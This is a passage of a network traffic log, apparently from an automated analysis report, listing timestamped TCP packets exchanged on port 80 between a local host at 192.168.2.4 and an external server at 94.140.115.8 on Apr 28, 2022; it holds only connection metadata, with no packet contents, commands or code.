Apr 28, 2022 15:47:51.747670889 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747692108 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747710943 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747725010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747736931 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.747785091 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.808720112 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.808751106 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.808767080 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.808779001 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.808840036 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809001923 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809202909 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809248924 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809267044 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809276104 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809293032 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809318066 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809335947 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809349060 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809375048 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809387922 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809395075 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809423923 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809442997 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809617043 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809634924 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809676886 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809689045 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.809704065 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809716940 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.809762001 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.866056919 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866080999 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866096973 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866113901 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866131067 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866147041 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866162062 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866179943 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.866199017 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866214991 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866234064 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866246939 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.866359949 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931590080 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931619883 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931638002 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931655884 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931673050 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931680918 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931690931 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931713104 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931727886 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931740999 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931751013 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931768894 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931777000 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931792021 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931830883 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931849003 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931862116 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.931893110 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.931915045 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.932434082 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.932461977 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.932478905 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.932492018 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.932503939 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.932519913 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.932533026 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.010667086 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010694981 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010711908 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010724068 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010757923 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010773897 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010795116 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010802984 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.010873079 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.010876894 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.010909081 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010927916 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010948896 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010955095 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.010967016 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.010982037 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.010988951 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.011018991 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.011085033 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.011101961 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.011113882 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.011121988 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.011135101 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.011168957 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093393087 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093420029 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093436956 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093453884 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093466043 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093488932 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093494892 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093512058 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093524933 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093542099 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093575954 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093594074 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093611002 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093628883 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093638897 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093657017 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093674898 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093683004 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093699932 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093710899 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093719959 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.093744993 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.093777895 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.116108894 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116137028 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116154909 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116170883 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116188049 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116200924 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.116219997 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116228104 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.116240025 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.116272926 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.116295099 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.117630959 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.117651939 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.117667913 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.117679119 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.117718935 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.117760897 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.163832903 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.163858891 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.163877010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.163888931 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.163938046 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.164000034 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.165623903 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.165654898 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.165673018 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.165690899 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.165698051 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.165710926 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.165747881 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.179863930 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.179893970 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.179910898 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.179923058 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.179994106 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.180036068 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.205565929 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.205585957 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.205646038 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.205657005 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.205670118 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.205689907 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.205727100 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.208410978 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.208431959 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.208477974 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.208491087 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.208518982 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.208554029 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.222927094 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.222948074 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.222965002 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.222979069 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.223001003 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.223041058 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.260257006 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.260283947 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.260302067 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.260313988 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.260402918 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.260504961 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.265027046 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.265050888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.265068054 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.265079021 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.265191078 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.265224934 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.280093908 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.280116081 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.280132055 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.280139923 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.280240059 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.281203985 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.323599100 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323626995 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323645115 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323662043 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323681116 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323692083 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.323709011 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.323719978 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323734045 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.323751926 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.323772907 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.327682972 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.327706099 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.327723980 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.327734947 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.327764988 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.327784061 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.341161966 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.341193914 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.341212034 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.341224909 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.341249943 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.341285944 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.371115923 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.371141911 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.371157885 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.371170998 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.371213913 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.371228933 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.372364044 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.372385979 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.372402906 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.372437954 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.372452021 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.372486115 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.373045921 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.373097897 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.373112917 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.373126030 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.373141050 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.373167038 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.373192072 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.413743973 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.413769960 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.413786888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.413800001 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.413907051 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.414437056 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.414457083 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.414474010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.414485931 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.414526939 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.414572001 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.417244911 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.417268991 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.417325020 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.417385101 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.417397976 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.417429924 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.417474985 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.429986954 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.430010080 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.430028915 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.430041075 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.430078030 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.430104971 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.454997063 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.455024004 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.455044031 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.455060005 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.455097914 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.455121040 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.456686020 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.456712008 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.456727982 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.456736088 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.456782103 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.456810951 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.457371950 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.457391977 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.457433939 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.457442045 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.457453966 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:52.457477093 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.457499027 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:52.470495939 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
